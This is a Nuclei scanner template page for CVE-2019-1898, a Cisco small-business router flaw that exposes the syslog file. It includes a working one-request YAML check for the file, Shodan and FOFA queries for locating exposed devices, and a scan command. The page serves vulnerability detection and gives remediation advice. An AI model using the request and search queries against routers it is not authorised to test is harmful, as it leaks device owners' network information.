Skip to content
Nuclei Templates

Cisco RV110W RV130W RV215W Router - Information leakage

ID: CVE-2019-1898

Severity: medium

Author: SleepingBag945

Tags: cve,cve2019,cisco,router,iot

Description

Section titled “Description”

A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file.

YAML Source

Section titled “YAML Source”
id: CVE-2019-1898


info:
  name: Cisco RV110W RV130W RV215W Router - Information leakage
  author: SleepingBag945
  severity: medium
  description: |
    A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file.
  impact: |
    An attacker can exploit this vulnerability to gain sensitive information from the router.
  remediation: |
    Apply the latest firmware update provided by Cisco to fix the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-1898
    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rv-fileaccess
    - https://www.tenable.com/security/research/tra-2019-29
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-1898
    cwe-id: CWE-425,CWE-285
    epss-score: 0.06856
    epss-percentile: 0.93891
    cpe: cpe:2.3:o:cisco:rv110w_firmware:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cisco
    product: rv110w_firmware
    shodan-query: http.favicon.hash:"-646322113"
    fofa-query: icon_hash="-646322113"
  tags: cve,cve2019,cisco,router,iot


http:
  - method: POST
    path:
      - '{{BaseURL}}/_syslog.txt'


    headers:
      Content-Type: application/x-www-form-urlencoded
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(to_lower(body), "ethernet") && contains(to_lower(body), "connection")'
          - 'contains(header, "application/octet-stream")'
        condition: and
# digest: 4a0a00473045022100caf48f2b323fbf0da5511cb076dd47411792271755e4cf1f5628911d554c3c0e02200f6ffd27eb1eb21933a101959e94744d502d7a0b28e331980a95a325fd269857:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-1898.yaml"

View on Github